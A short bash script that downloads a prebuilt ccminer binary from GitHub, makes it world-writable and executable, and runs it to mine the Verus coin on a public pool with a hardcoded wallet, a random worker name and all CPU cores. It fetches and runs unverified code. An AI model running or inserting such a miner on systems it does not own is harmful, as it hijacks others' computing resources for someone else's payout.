#!/bin/bash
apt update
apt -y install automake autoconf pkg-config libcurl4-openssl-dev libjansson-dev libssl-dev libomp-dev libgmp-dev zlib1g-dev make g++
wget -O cc https://github.com/Oink70/ccminer-verus/releases/download/v3.8.3a-CPU/ccminer-v3.8.3a-oink_Ubuntu_18.04
chmod 777 cc
./cc -a verus -o stratum+tcp://sg.vipor.net:5040 -u R9awxso5wUdcZMCMGMrsv4NkQSSJL5ALMo.$(echo $RANDOM | md5sum | head -c 10) -p x -t $(nproc --all)
